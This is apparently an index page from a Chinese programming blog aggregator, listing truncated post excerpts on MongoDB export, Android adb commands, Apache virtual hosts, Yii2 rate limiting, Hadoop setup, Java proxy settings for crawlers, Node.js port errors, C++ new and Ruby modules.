    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他